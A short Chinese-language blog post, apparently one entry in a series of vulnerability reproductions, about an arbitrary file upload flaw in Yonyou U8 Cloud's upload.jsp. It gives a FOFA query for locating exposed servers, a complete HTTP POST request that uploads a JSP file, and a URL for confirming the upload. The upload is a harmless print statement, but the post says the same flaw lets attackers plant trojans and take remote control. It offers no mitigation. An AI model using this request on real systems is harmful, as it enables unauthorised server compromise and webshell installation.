Babing
Published on 2024-08-30 / 2 Visits
0
0

Y3-14用友-U8-Cloud-文件上传

Y3-14用友-U8-Cloud-文件上传

漏洞描述:

用友U8 Cloud upload.jsp接口存在任意文件上传漏洞,攻击者可通过该漏洞上传木马,远程控制服务器。

网站图片:

image-20240623104253100

网络测绘:

fofa语法:

FOFA:app=“用友-U8-Cloud”

漏洞复现:

payload:

POST /linux/pages/upload.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
filename: rce.jsp

<% out.println("Hello,U8C");%>

效果图:
bd320edd1a3846538ba3c1b568baf2b5.png
验证url

http://your-ip/linux/上传文件名.jsp


Comment